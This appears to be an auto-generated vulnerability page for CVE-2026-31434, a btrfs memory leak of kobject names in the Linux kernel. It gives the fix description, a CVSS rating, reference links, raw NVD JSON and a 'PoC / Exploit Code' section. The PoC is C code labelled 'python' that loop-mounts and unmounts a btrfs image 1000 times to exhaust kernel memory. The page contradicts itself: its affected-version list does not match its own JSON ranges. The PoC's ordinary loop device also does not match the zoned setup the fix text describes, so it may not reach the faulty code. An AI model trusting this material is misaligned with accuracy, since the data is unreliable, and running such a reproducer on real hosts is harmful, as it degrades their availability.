CVE-2026-31434

Description

In the Linux kernel, the following vulnerability has been resolved: btrfs: fix leak of kobject name for sub-group space_info When create_space_info_sub_group() allocates elements of space_info->sub_group[], kobject_init_and_add() is called for each element via btrfs_sysfs_add_space_info_type(). However, when check_removing_space_info() frees these elements, it does not call btrfs_sysfs_remove_space_info() on them. As a result, kobject_put() is not called and the associated kobj->name objects are leaked. This memory leak is reproduced by running the blktests test case zbd/009 on kernels built with CONFIG_DEBUG_KMEMLEAK. The kmemleak feature reports the following error: unreferenced object 0xffff888112877d40 (size 16): comm "mount", pid 1244, jiffies 4294996972 hex dump (first 16 bytes): 64 61 74 61 2d 72 65 6c 6f 63 00 c4 c6 a7 cb 7f data-reloc...... backtrace (crc 53ffde4d): __kmalloc_node_track_caller_noprof+0x619/0x870 kstrdup+0x42/0xc0 kobject_set_name_vargs+0x44/0x110 kobject_init_and_add+0xcf/0x150 btrfs_sysfs_add_space_info_type+0xfc/0x210 [btrfs] create_space_info_sub_group.constprop.0+0xfb/0x1b0 [btrfs] create_space_info+0x211/0x320 [btrfs] btrfs_init_space_info+0x15a/0x1b0 [btrfs] open_ctree+0x33c7/0x4a50 [btrfs] btrfs_get_tree.cold+0x9f/0x1ee [btrfs] vfs_get_tree+0x87/0x2f0 vfs_cmd_create+0xbd/0x280 __do_sys_fsconfig+0x3df/0x990 do_syscall_64+0x136/0x1540 entry_SYSCALL_64_after_hwframe+0x76/0x7e To avoid the leak, call btrfs_sysfs_remove_space_info() instead of kfree() for the elements.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 5.10.223

Linux Kernel < 5.15.162

Linux Kernel < 6.1.96

Linux Kernel < 6.6.36

Linux Kernel < 6.9.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-31434: Linux Kernel BTRFS Memory Leak
 * This script attempts to trigger the leak by repeatedly mounting/unmounting a BTRFS image.
 * Compile with: gcc -o poc_btrfs_leak poc_btrfs_leak.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <fcntl.h>

#define LOOP_DEVICE "/dev/loop0"
#define MOUNT_POINT "/mnt/btrfs_test"
#define IMAGE_FILE "btrfs.img"

void setup_environment() {
    system("dd if=/dev/zero of=" IMAGE_FILE " bs=1M count=512 2>/dev/null");
    system("losetup " LOOP_DEVICE " " IMAGE_FILE " 2>/dev/null");
    system("mkfs.btrfs " LOOP_DEVICE " 2>/dev/null");
    mkdir(MOUNT_POINT, 0777);
}

void cleanup_environment() {
    system("umount " MOUNT_POINT " 2>/dev/null");
    system("losetup -d " LOOP_DEVICE " 2>/dev/null");
    system("rm -f " IMAGE_FILE);
    rmdir(MOUNT_POINT);
}

int main() {
    setup_environment();
    printf("Starting BTRFS memory leak reproduction...\n");

    for (int i = 0; i < 1000; i++) {
        if (mount(LOOP_DEVICE, MOUNT_POINT, "btrfs", 0, NULL) == 0) {
            // Trigger space info operations
            system("touch " MOUNT_POINT "/testfile 2>/dev/null");
            usleep(10000); // Small delay
            umount(MOUNT_POINT);
        } else {
            perror("Mount failed");
            break;
        }
        if (i % 100 == 0) printf("Iteration %d completed.\n", i);
    }

    cleanup_environment();
    printf("Check kernel logs or kmemleak for unreferenced objects.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31434
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31434
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31434/
[4] VulDB https://vuldb.com/cve/CVE-2026-31434
[5] https://git.kernel.org/stable/c/1737ddeafbb1304f41ec2eede4f7366082e7c96a
[6] https://git.kernel.org/stable/c/3c645c6f7e5470debbb81666b230056de48f36dc
[7] https://git.kernel.org/stable/c/3c844d01f9874a43004c82970d8da94f9aba8949
[8] https://git.kernel.org/stable/c/416484f21a9d1280cf6daa7ebc10c79b59c46e48
[9] https://git.kernel.org/stable/c/94054ffd311a1f76b7093ba8ebf50bdb0d28337c
[10] https://git.kernel.org/stable/c/a4376d9a5d4c9610e69def3fc0b32c86a7ab7a41

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31434", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-22T14:16:36.533", "lastModified": "2026-05-20T15:11:33.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix leak of kobject name for sub-group space_info\n\nWhen create_space_info_sub_group() allocates elements of\nspace_info->sub_group[], kobject_init_and_add() is called for each\nelement via btrfs_sysfs_add_space_info_type(). However, when\ncheck_removing_space_info() frees these elements, it does not call\nbtrfs_sysfs_remove_space_info() on them. As a result, kobject_put() is\nnot called and the associated kobj->name objects are leaked.\n\nThis memory leak is reproduced by running the blktests test case\nzbd/009 on kernels built with CONFIG_DEBUG_KMEMLEAK. The kmemleak\nfeature reports the following error:\n\nunreferenced object 0xffff888112877d40 (size 16):\n comm \"mount\", pid 1244, jiffies 4294996972\n hex dump (first 16 bytes):\n 64 61 74 61 2d 72 65 6c 6f 63 00 c4 c6 a7 cb 7f data-reloc......\n backtrace (crc 53ffde4d):\n __kmalloc_node_track_caller_noprof+0x619/0x870\n kstrdup+0x42/0xc0\n kobject_set_name_vargs+0x44/0x110\n kobject_init_and_add+0xcf/0x150\n btrfs_sysfs_add_space_info_type+0xfc/0x210 [btrfs]\n create_space_info_sub_group.constprop.0+0xfb/0x1b0 [btrfs]\n create_space_info+0x211/0x320 [btrfs]\n btrfs_init_space_info+0x15a/0x1b0 [btrfs]\n open_ctree+0x33c7/0x4a50 [btrfs]\n btrfs_get_tree.cold+0x9f/0x1ee [btrfs]\n vfs_get_tree+0x87/0x2f0\n vfs_cmd_create+0xbd/0x280\n __do_sys_fsconfig+0x3df/0x990\n do_syscall_64+0x136/0x1540\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nTo avoid the leak, call btrfs_sysfs_remove_space_info() instead of\nkfree() for the elements."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.162", "versionEndExcluding": "6.1.168", "matchCriteriaId": "1C240D52-1BFC-4F7E-A81D-58DE5E627247"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.122", "versionEndExcluding": "6.6.131", "matchCriteriaId": "71FB4B35-54E8-40A0-98EF-342E1577E167"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.12.67", "versionEndExcluding": "6.12.80", "matchCriteriaId": "E63FD44B-7F11-44F2-B10F-0F52157A6163"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16", "versionEndExcluding": "6.18.21", "matchCriteriaId": "A6CA36DA-3783-4321-81A6-485364836084"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1737ddeafbb1304f41ec2eede4f7366082e7c96a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3c645c6f7e5470debbb81666b230056de48f36dc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3c844d01f9874a43004c82970d8da94f9aba8949", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https:// ... (truncated)